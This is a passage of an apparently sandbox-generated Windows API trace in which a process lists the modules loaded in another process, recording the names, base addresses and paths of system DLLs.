hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x2501870, cb=0x18 | out: lpmodinfo=0x2501870*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0064.252] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0064.253] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0064.254] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x2503a30, cb=0x18 | out: lpmodinfo=0x2503a30*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0064.254] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0064.255] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0064.256] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2505bf0, cb=0x18 | out: lpmodinfo=0x2505bf0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0064.257] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0064.258] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0064.258] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2507e48, cb=0x18 | out: lpmodinfo=0x2507e48*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0064.260] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0064.260] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0064.261] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x250a020, cb=0x18 | out: lpmodinfo=0x250a020*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0064.262] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0064.263] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0064.264] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x250c1d0, cb=0x18 | out: lpmodinfo=0x250c1d0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0064.265] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0064.266] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0064.267] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x250e390, cb=0x18 | out: lpmodinfo=0x250e390*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0064.268] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0064.269] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0064.270] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x2510550, cb=0x18 | out: lpmodinfo=0x2510550*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0064.271] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0064.272] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0064.274] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x2512710, cb=0x18 | out: lpmodinfo=0x2512710*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0064.275] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0064.276] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0064.277] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x25148e0, cb=0x18 | out: lpmodinfo=0x25148e0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0064.278] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0064.280] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0064.281] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb410000, lpmodinfo=0x2516ab0, cb=0x18 | out: lpmodinfo=0x2516ab0*(lpBaseOfDll=0x7fefb410000, SizeOfImage=0xc2000, EntryPoint=0x7fefb41101c)) returned 1 [0064.282] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb410000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="gpsvc.dll") returned 0x9 [0064.284] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb410000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")) returned 0x1d [0064.285] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb00000, lpmodinfo=0x2518d88, cb=0x18 | out: lpmodinfo=0x2518d88*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0064.286] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb00000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0064.288] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb00000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0064.289] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x251af48, cb=0x18 | out: lpmodinfo=0x251af48*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0064.290] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0064.292] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0064.294] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x251d108, cb=0x18 | out: lpmodinfo=0x251d108*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0064.295] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0064.296] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0064.298] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x251f2c8, cb=0x18 | out: lpmodinfo=0x251f2c8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0064.299] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0064.301] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0064.303] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x2521488, cb=0x18 | out: lpmodinfo=0x2521488*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0064.304] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0064.306] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0064.308] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1d0000, lpmodinfo=0x2523638, cb=0x18 | out: lpmodinfo=0x2523638*(lpBaseOfDll=0x7fefd1d0000, SizeOfImage=0xa000, EntryPoint=0x7fefd1d3b40)) returned 1 [0064.309] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SYSNTFY.dll") returned 0xb [0064.311] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\SYSNTFY.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")) returned 0x1f [0064.313] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb3f0000, lpmodinfo=0x25257f8, cb=0x18 | out: lpmodinfo=0x25257f8*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0064.314] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0064.316] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0064.318] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x25279b8, cb=0x18 | out: lpmodinfo=0x25279b8*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0064.320] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0064.322] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0064.324] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb370000, lpmodinfo=0x2529b88, cb=0x18 | out: lpmodinfo=0x2529b88*(lpBaseOfDll=0x7fefb370000, SizeOfImage=0x37000, EntryPoint=0x7fefb378424)) returned 1 [0064.325] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb370000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="profsvc.dll") returned 0xb [0064.327] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb370000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")) returned 0x1f [0064.329] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x252bd48, cb=0x18 | out: lpmodinfo=0x252bd48*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0064.331] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0064.333] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0064.335] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb20000, lpmodinfo=0x252df18, cb=0x18 | out: lpmodinfo=0x252df18*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0064.337] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb20000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0064.339] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb20000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0064.341] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x25300f0, cb=0x18 | out: lpmodinfo=0x25300f0*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0064.343] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0064.345] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0064.347] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x25322b0, cb=0x18 | out: lpmodinfo=0x25322b0*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0064.349] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0064.351] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0064.354] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb350000, lpmodinfo=0x2534470, cb=0x18 | out: lpmodinfo=0x2534470*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0064.356] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb350000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0064.358] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb350000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0064.360] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x2536620, cb=0x18 | out: lpmodinfo=0x2536620*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0064.363] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0064.365] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0064.367] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x25387e0, cb=0x18 | out: lpmodinfo=0x25387e0*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0064.369] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0064.372] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0064.374] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x253abb8, cb=0x18 | out: lpmodinfo=0x253abb8*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0064.376] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0064.379] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0064.381] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb340000, lpmodinfo=0x253cd78, cb=0x18 | out: lpmodinfo=0x253cd78*(lpBaseOfDll=0x7fefb340000, SizeOfImage=0x10000, EntryPoint=0x7fefb34835c)) returned 1 [0064.383] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb340000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="themeservice.dll") returned 0x10 [0064.386] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb340000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")) returned 0x24 [0064.389] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x253ef58, cb=0x18 | out: lpmodinfo=0x253ef58*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0064.391] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0064.394] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0064.396] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb330000, lpmodinfo=0x2541118, cb=0x18 | out: lpmodinfo=0x2541118*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0064.398] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb330000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0064.401] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb330000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0064.405] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb320000, lpmodinfo=0x25432d8, cb=0x18 | out: lpmodinfo=0x25432d8*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0064.407] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb320000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0064.410] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb320000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0064.413] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc0d0000, lpmodinfo=0x2545488, cb=0x18 | out: lpmodinfo=0x2545488*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0064.416] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0064.418] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0064.421] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb800000, lpmodinfo=0x2547648, cb=0x18 | out: lpmodinfo=0x2547648*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0064.424] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb800000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0064.426] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb800000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0064.429] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb240000, lpmodinfo=0x2549808, cb=0x18 | out: lpmodinfo=0x2549808*(lpBaseOfDll=0x7fefb240000, SizeOfImage=0x14000, EntryPoint=0x7fefb243e64)) returned 1 [0064.432] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb240000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="sens.dll") returned 0x8 [0064.435] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb240000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")) returned 0x1c [0064.438] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x254b9c8, cb=0x18 | out: lpmodinfo=0x254b9c8*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0064.441] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0064.443] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0064.446] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb00000, lpmodinfo=0x254db88, cb=0x18 | out: lpmodinfo=0x254db88*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0064.449] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb00000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0064.452] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb00000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0064.455] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb2a0000, lpmodinfo=0x254fd58, cb=0x18 | out: lpmodinfo=0x254fd58*(lpBaseOfDll=0x7fefb2a0000, SizeOfImage=0x67000, EntryPoint=0x7fefb2b6060)) returned 1 [0064.458] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb2a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ES.DLL") returned 0x6 [0064.461] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb2a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ES.DLL" (normalized: "c:\\windows\\system32\\es.dll")) returned 0x1a [0064.465] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd680000, lpmodinfo=0x2551f08, cb=0x18 | out: lpmodinfo=0x2551f08*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0064.468] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd680000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SXS.DLL") returned 0x7 [0064.471] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd680000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SXS.DLL" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0064.474] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc260000, lpmodinfo=0x25540d0, cb=0x18 | out: lpmodinfo=0x25540d0*(lpBaseOfDll=0x7fefc260000, SizeOfImage=0x1d000, EntryPoint=0x7fefc261ef4)) returned 1 [0064.477] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc260000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SAMLIB.dll") returned 0xa [0064.480] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc260000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMLIB.dll" (normalized: "c:\\windows\\system32\\samlib.dll")) returned 0x1e [0064.483] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefaba0000, lpmodinfo=0x2556290, cb=0x18 | out: lpmodinfo=0x2556290*(lpBaseOfDll=0x7fefaba0000, SizeOfImage=0x5e000, EntryPoint=0x7fefaba9024)) returned 1 [0064.486] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefaba0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="shsvcs.dll") returned 0xa [0064.489] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefaba0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")) returned 0x1e [0064.493] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x2558450, cb=0x18 | out: lpmodinfo=0x2558450*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0064.496] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0064.499] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0064.502] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdc80000, lpmodinfo=0x255a620, cb=0x18 | out: lpmodinfo=0x255a620*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0064.505] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdc80000, lpBaseName=0xd91f20, 